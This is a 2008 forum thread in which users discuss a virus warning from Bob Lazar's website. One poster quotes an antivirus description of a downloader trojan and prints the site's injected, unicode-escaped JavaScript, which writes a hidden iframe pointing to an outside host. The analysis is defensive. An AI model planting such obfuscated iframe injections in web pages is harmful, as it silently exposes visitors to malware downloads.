It looks like you're using an Ad Blocker.

Please white-list or disable AboveTopSecret.com in your ad-blocking tool.

Thank you.

 

Some features of ATS will be disabled while you continue to use an ad-blocker.

 

I just went to Bob Lazar's site and got a virus...

page: 1
1

log in

join
share:

posted on Apr, 9 2008 @ 03:32 AM
link   
I went to his site boblazar.com just to check if the password still didn't work. Well you don't need a password anymore, but my virus scanner started popping up with infected files from the site.

Do you think it's the owners of the site that installed a script or exploit on the site or is it some kind of government spyware or cookie or something tracking people who look into the subject?




posted on Apr, 9 2008 @ 04:24 AM
link   
reply to post by Diplomat
 


Hmmm, I'm not game enough to go there to check!
Perhaps one of the techs or IT members here could check it out and post a response?



posted on Apr, 9 2008 @ 04:33 AM
link   
Trojan-Downloader.JS.Psyme.gy




Technical details
This Trojan downloads other programs via the Internet and launches them on the victim machine without the user’s

knowledge or consent. The Trojan is a Java Script script which is built in to HTML pages.
It is 17,002 bytes in size.

Payload
Once launched, the Trojan injects its code into the memory of processes which have the following unique identifiers

in the system registry:

[BD96C556-65A3-11D0-983A-00C04FC29E30]
[BD96C556-65A3-11D0-983A-00C04FC29E36]
[AB9BCEDD-EC7E-47E1-9322-D4A210617116]
[0006F033-0000-0000-C000-000000000046]
[0006F03A-0000-0000-C000-000000000046]
[6e32070a-766d-4ee6-879c-dc1fa91d2fc3]
[6414512B-B978-451D-A0D8-FCFDF33E833C]
[7F5B7F63-F06F-4331-8A26-339E03C0AE3D]
[06723E09-F4C2-43c8-8358-09FCD1DB0766]
[639F725F-1B2D-4831-A9FD-874847682010]
[BA018599-1DB3-44f9-83B4-461454C84BF8]
[D0C07D56-7C69-43F1-B4A0-25F5A11FAB19]
[E8CCCDDF-CA28-496b-B050-6C07C962476B]
The Trojan then attempts to connect to the Internet and download a file called "file.php" from the following

address:

my...***l.com/file.pho
(At the time of writing, this link was not working.)

This file will be saved to the C: \ root directory as "sys%rnd%.exe (%rnd% is a random four digit number):

c:\sys%rnd%.exe
The downloaded file is then launched for execution.



Removal instructions
If your computer does not have an up-to-date antivirus, or does not have an antivirus solution at all, follow the

instructions below to delete the malicious program:

Delete the original Trojan file (the location will depend on how the program originally penetrated the victim machine).
Delete the following file:
c:\sys%rnd%.exe
Update your antivirus databases and perform a full scan of the computer

www.viruslist.com...

The virus is downloaded once you open this page
http : // www. boblazar. com/ closed/ index. html

I took a look at the source code:

The issue is this one:

< script type ="text/_javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u007 4\u0070\u003a\u002f\u002f\u0074\u006f\u0070\u0031\u0030\u0030\u002d\u0063\u006f\u0075\u006e\u0074\u0065\u0072\u002e\u0063\u006f\ u006d\u002f\u0074\u006f\u0070\u0031\u0030\u0030\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u00 74\u0079\u006c\u0065\u003d\u0022\u0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u003a\u0020\u0068\u0069\u0064\u0064 u0065\u006e\u003b\u0020\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u0020\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0 069\u0066\u0072\u0061\u006d\u0065\u003e\u0020')
< / script >

This is an iframe encoded tag: with the iframe
tag, you can embed a page in another one, even from another website.
But it may happen that a webmaster ( a HECK of a webmaster ) is unaware of it.


Now, changin the "document.write" instruction to "alert" this is the result:

If you click here Google result
then you get this result:



If i'm correct, there are some web page generators which embed automatically the malicious code in the pages that they build.

See also:
Massive Web Server Hacks (”iFrame Attacks”) - Now Extended To TYPO3
I've sent an email to a friend in order to bring the issue to Bob Lazar's attention.
Thanks for sharing this information, diplomat.


[edit on 10/4/2008 by internos]



posted on Apr, 9 2008 @ 04:32 PM
link   
Heh, I feel for you but, I employed United Nulclear and
all I got was this lousy freakin' T-shirt!

Oh before I forget, element 115 no way as good as The
Fifth Element, but we're sending someone in to negotiate.



new topics

top topics
 
1

log in

join